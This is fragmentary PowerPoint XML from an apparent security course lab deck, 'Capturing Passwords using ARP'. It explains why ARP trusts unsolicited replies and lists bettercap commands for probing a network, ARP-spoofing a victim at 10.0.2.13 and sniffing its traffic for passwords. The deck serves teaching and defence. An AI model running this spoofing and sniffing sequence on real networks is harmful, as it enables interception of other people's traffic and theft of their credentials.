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617" r:id="rId3"/>
    <p:sldId id="618" r:id="rId4"/>
    <p:sldId id="619" r:id="rId5"/>
    <p:sldId id="620" r:id="rId6"/>
    <p:sldId id="621" r:id="rId7"/>
    <p:sldId id="627" r:id="rId8"/>
    <p:sldId id="622" r:id="rId9"/>
    <p:sldId id="623" r:id="rId10"/>
    <p:sldId id="624" r:id="rId11"/>
    <p:sldId id="628" r:id="rId12"/>
    <p:sldId id="625" r:id="rId13"/>
    <p:sldId id="629" r:id="rId14"/>
    <p:sldId id="630" r:id="rId15"/>
    <p:sldId id="632" r:id="rId16"/>
    <p:sldId id="633" r:id="rId17"/>
    <p:sldId id="631" r:id="rId18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21"/>
      <p:bold r:id="rId22"/>
      <p:italic r:id="rId23"/>
      <p:boldItalic r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId25"/>
      <p:bold r:id="rId26"/>
      <p:italic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis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26" d="100"/>
          <a:sy n="126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4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5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9FE04AE-1C9E-DE42-81E3-1F2B97DAAE1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4" r:id="rId3"/>
    <p:sldLayoutId id="2147483666" r:id="rId4"/>
    <p:sldLayoutId id="214748366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Capturing Passwords using ARP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33" y="4678462"/>
            <a:ext cx="3805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Modified based on https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>://samsclass.info/126/126_F13.shtml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615433"/>
            <a:ext cx="4220164" cy="1676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spoof success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24" y="1959131"/>
            <a:ext cx="3234117" cy="113515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95787" y="2628666"/>
            <a:ext cx="2980023" cy="313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95787" y="2736622"/>
            <a:ext cx="2980023" cy="407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0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Sniff </a:t>
            </a:r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27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 traffic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393"/>
            <a:ext cx="9144000" cy="14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2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0363"/>
            <a:ext cx="573485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8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captured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180358"/>
            <a:ext cx="9144000" cy="33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9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 the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4" y="1999239"/>
            <a:ext cx="696374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3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88719" y="1184407"/>
            <a:ext cx="710670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ell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>// discover all devices in the network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net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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on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//both target and gateway are will be attacked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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arp.spoof.fullduplex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true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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>targets : Windows 10 PC</a:t>
            </a:r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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arp.spoof.targets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 10.0.2.13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//spoof attack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arp.spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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on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//spy on target/victim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net.sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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18510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51900"/>
            <a:ext cx="631595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0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reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ARP using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sniff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407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reconnaissance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bettercap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917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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(ARP) Poisoning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383279"/>
            <a:ext cx="1584961" cy="1188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67" y="1191321"/>
            <a:ext cx="1475232" cy="91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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3956325" y="2373444"/>
            <a:ext cx="1354229" cy="1052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058" y="2099121"/>
            <a:ext cx="1722309" cy="17223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8100" y="3513653"/>
            <a:ext cx="83067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8603" y="2194105"/>
            <a:ext cx="1329210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Kali: 10.0.2.14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557" y="4648847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Victim: 10.0.2.13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66757" y="1849902"/>
            <a:ext cx="1280160" cy="52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33975" y="2595489"/>
            <a:ext cx="717453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5483" y="176549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761" y="276736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at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7219" y="1762770"/>
            <a:ext cx="151836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Victim: 10.0.2.13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81102" y="2773559"/>
            <a:ext cx="83067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10.0.2.1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486400" y="2820572"/>
            <a:ext cx="1184658" cy="78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01112" y="3859992"/>
            <a:ext cx="5474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root cause of ARP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accept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>even if they did not send a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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doesn’t verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any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Kali and Windows 10 IP and MAC addresses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64" y="1594912"/>
            <a:ext cx="4438922" cy="232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662" y="4501590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-all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if need MAC address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9" y="4809367"/>
            <a:ext cx="4581525" cy="238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3974" y="26842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13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050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80" y="1073851"/>
            <a:ext cx="3178319" cy="34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Probe on the whole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44"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="90619" y="1365297"/>
            <a:ext cx="9144000" cy="2956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6624" y="289450"/>
            <a:ext cx="259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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command at any step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98" y="176464"/>
            <a:ext cx="441026" cy="4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0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 visible devices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239"/>
            <a:ext cx="9144000" cy="18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4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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bettercap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26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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and start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9" y="1082425"/>
            <a:ext cx="7678492" cy="39502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11954" y="82107"/>
            <a:ext cx="1611713" cy="7078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800" dirty="0" err="1"/>
              <a:t>net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>arp.spoof.fullduplex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>arp.spoof.targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> 10.0.2.13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>arp.spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>net.sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800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1035836111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190</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)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Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Bell MT</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Dosis</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Capturing Passwords using ARP</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Network reconnaissance</vt:lpstr>
      <vt:lpstr>Address Resolution Protocol (ARP) Poisoning</vt:lpstr>
      <vt:lpstr>Find Kali and Windows 10 IP and MAC addresses</vt:lpstr>
      <vt:lpstr>Probe on the whole network</vt:lpstr>
      <vt:lpstr>Show all visible devices</vt:lpstr>
      <vt:lpstr>ARP using bettercap</vt:lpstr>
      <vt:lpstr>Spoof config and start</vt:lpstr>
      <vt:lpstr>ARP spoof success</vt:lpstr>
      <vt:lpstr>Sniff password</vt:lpstr>
      <vt:lpstr>Sniff traffic </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Password captured</vt:lpstr>
      <vt:lpstr>Quit the tool</vt:lpstr>
      <vt:lpstr>Summary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609</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-29T20:58:34Z</dcterms:modified>
</cp:coreProperties>
</file>